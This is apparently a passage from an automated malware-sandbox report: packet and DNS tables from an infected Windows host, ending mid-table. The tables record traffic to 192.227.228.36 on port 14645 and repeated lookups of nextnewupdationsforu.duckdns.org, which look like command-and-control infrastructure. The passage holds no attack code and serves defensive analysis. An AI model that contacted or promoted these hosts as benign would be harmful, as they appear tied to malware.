                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.445399046 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.445410967 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.447505951 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.447848082 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.447864056 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.529793024 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.536297083 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.541557074 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.541611910 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.541637897 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.544409037 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.544508934 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.544517994 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.552874088 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.552977085 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.552985907 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.562489033 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.562519073 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.562558889 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.562570095 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.562622070 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.562772036 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.566865921 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.566958904 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.566965103 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.639153004 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.658941984 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.659080982 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.659138918 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.659147024 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.660593033 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.660626888 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.660648108 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.660723925 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.660723925 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.660732031 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.669917107 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.670224905 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.670234919 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.672012091 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.672074080 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.954835892 CET55677443192.168.2.8172.217.16.193
                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.954865932 CET44355677172.217.16.193192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.764638901 CET55693443192.168.2.818.244.18.27
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.764672995 CET4435569318.244.18.27192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.764722109 CET55693443192.168.2.818.244.18.27
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.765088081 CET55693443192.168.2.818.244.18.27
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.765101910 CET4435569318.244.18.27192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:45.655049086 CET4435569318.244.18.27192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:45.655272007 CET55693443192.168.2.818.244.18.27
                                                                                                                                                                                                                                Nov 18, 2024 16:53:45.655297041 CET4435569318.244.18.27192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:45.656389952 CET4435569318.244.18.27192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:45.656438112 CET55693443192.168.2.818.244.18.27
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.512372971 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517498016 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517556906 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517585039 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517591000 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517612934 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517630100 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517630100 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517642021 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517690897 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517695904 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517718077 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517738104 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517745972 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517755985 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517772913 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517786026 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517802954 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517849922 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.522856951 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.522888899 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.522943020 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.522952080 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.522970915 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.522984982 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523000956 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523029089 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523073912 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523073912 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523078918 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523108006 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523135900 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523153067 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523169041 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523199081 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523217916 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523240089 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.525227070 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528157949 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528228045 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528283119 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528316021 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528359890 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528390884 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528400898 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528600931 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528633118 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528768063 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528798103 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528825045 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528856039 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528883934 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528932095 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528958082 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528985023 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529036045 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529087067 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529114008 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529144049 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529232025 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529258966 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529301882 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529334068 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529361010 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.530344963 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.530376911 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.530404091 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.530467987 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533276081 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533308029 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533355951 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533386946 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533500910 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533528090 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533627033 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533654928 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533687115 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533730030 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.534326077 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.534390926 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:51.738832951 CET55693443192.168.2.818.244.18.27
                                                                                                                                                                                                                                Nov 18, 2024 16:53:51.738899946 CET4435569318.244.18.27192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:51.738974094 CET55693443192.168.2.818.244.18.27
                                                                                                                                                                                                                                Nov 18, 2024 16:54:08.895694971 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:54:08.896980047 CET5564914645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:54:08.901932001 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:54:23.353506088 CET5565180192.168.2.8178.237.33.50
                                                                                                                                                                                                                                Nov 18, 2024 16:54:23.359092951 CET8055651178.237.33.50192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:54:39.322411060 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:54:39.324409008 CET5564914645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:54:39.329303026 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:55:09.790617943 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:55:09.792211056 CET5564914645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:55:09.797230005 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:55:39.913151979 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:55:39.915179014 CET5564914645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:55:39.920193911 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:56:10.473118067 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:56:10.475270033 CET5564914645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:56:10.480870962 CET1464555649192.227.228.36192.168.2.8

                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Nov 18, 2024 16:52:31.055679083 CET6348853192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:52:31.073869944 CET53634881.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:49.576652050 CET5364500162.159.36.2192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:50.219079018 CET5483953192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:52:50.227216005 CET53548391.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.650696039 CET6263453192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:00.662868977 CET6263453192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:01.664617062 CET6263453192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:03.678389072 CET6263453192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:03.968883038 CET53626341.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:03.968925953 CET53626341.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:03.968955994 CET53626341.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:03.968991041 CET53626341.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:04.975879908 CET6008053192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:05.978439093 CET6008053192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:06.985733986 CET6008053192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:08.986231089 CET53600801.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:08.986274004 CET53600801.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:08.986303091 CET53600801.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:10.007330894 CET6335753192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:11.006668091 CET6335753192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:12.011056900 CET6335753192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:14.016832113 CET53633571.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:14.016879082 CET53633571.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:14.016916990 CET53633571.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:15.022682905 CET5743553192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:16.022196054 CET5743553192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:17.022600889 CET5743553192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.040205002 CET5743553192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.290700912 CET53574351.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.290724039 CET53574351.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.290738106 CET53574351.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.294964075 CET53574351.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:20.308290958 CET5160753192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:20.913058043 CET53516071.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:22.962208986 CET6398353192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:22.971534967 CET53639831.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:37.406054974 CET6356253192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.772593975 CET6115153192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:41.531089067 CET5765153192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:41.538750887 CET53576511.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.740674019 CET4929753192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.748003960 CET5656153192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.748486996 CET53492971.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.751754999 CET5806253192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.759027004 CET6049653192.168.2.81.1.1.1

                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Nov 18, 2024 16:52:31.055679083 CET192.168.2.81.1.1.10x76abStandard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:52:50.219079018 CET192.168.2.81.1.1.10xa470Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:52:59.650696039 CET192.168.2.81.1.1.10xae18Standard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:00.662868977 CET192.168.2.81.1.1.10xae18Standard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:01.664617062 CET192.168.2.81.1.1.10xae18Standard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:03.678389072 CET192.168.2.81.1.1.10xae18Standard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:04.975879908 CET192.168.2.81.1.1.10xb978Standard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:05.978439093 CET192.168.2.81.1.1.10xb978Standard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:06.985733986 CET192.168.2.81.1.1.10xb978Standard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:10.007330894 CET192.168.2.81.1.1.10x1398Standard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:11.006668091 CET192.168.2.81.1.1.10x1398Standard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:12.011056900 CET192.168.2.81.1.1.10x1398Standard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:15.022682905 CET192.168.2.81.1.1.10x6f7aStandard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:16.022196054 CET192.168.2.81.1.1.10x6f7aStandard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:17.022600889 CET192.168.2.81.1.1.10x6f7aStandard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.040205002 CET192.168.2.81.1.1.10x6f7aStandard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:20.308290958 CET192.168.2.81.1.1.10x3204Standard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:22.962208986 CET192.168.2.81.1.1.10xe12cStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:37.406054974 CET192.168.2.81.1.1.10x4803Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.772593975 CET192.168.2.81.1.1.10xb2fcStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:41.531089067 CET192.168.2.81.1.1.10x5808Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.740674019 CET192.168.2.81.1.1.10x67c2Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.748003960 CET192.168.2.81.1.1.10x45a0Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.751754999 CET192.168.2.81.1.1.10x5979Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.759027004 CET192.168.2.81.1.1.10x1b91Standard query (0)api.msn.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Nov 18, 2024 16:52:31.073869944 CET1.1.1.1192.168.2.80x76abNo error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:52:31.073869944 CET1.1.1.1192.168.2.80x76abNo error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:52:50.227216005 CET1.1.1.1192.168.2.80xa470Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:03.968883038 CET1.1.1.1192.168.2.80xae18Server failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:03.968925953 CET1.1.1.1192.168.2.80xae18Server failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:03.968955994 CET1.1.1.1192.168.2.80xae18Server failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:03.968991041 CET1.1.1.1192.168.2.80xae18Server failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:08.986231089 CET1.1.1.1192.168.2.80xb978Server failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:08.986274004 CET1.1.1.1192.168.2.80xb978Server failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:08.986303091 CET1.1.1.1192.168.2.80xb978Server failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:14.016832113 CET1.1.1.1192.168.2.80x1398Server failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:14.016879082 CET1.1.1.1192.168.2.80x1398Server failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:14.016916990 CET1.1.1.1192.168.2.80x1398Server failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.290700912 CET1.1.1.1192.168.2.80x6f7aServer failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.290724039 CET1.1.1.1192.168.2.80x6f7aServer failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.290738106 CET1.1.1.1192.168.2.80x6f7aServer failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.294964075 CET1.1.1.1192.168.2.80x6f7aServer failure (2)nextnewupdationsforu.duckdns.orgnonenoneA (IP address)IN (0x0001)false
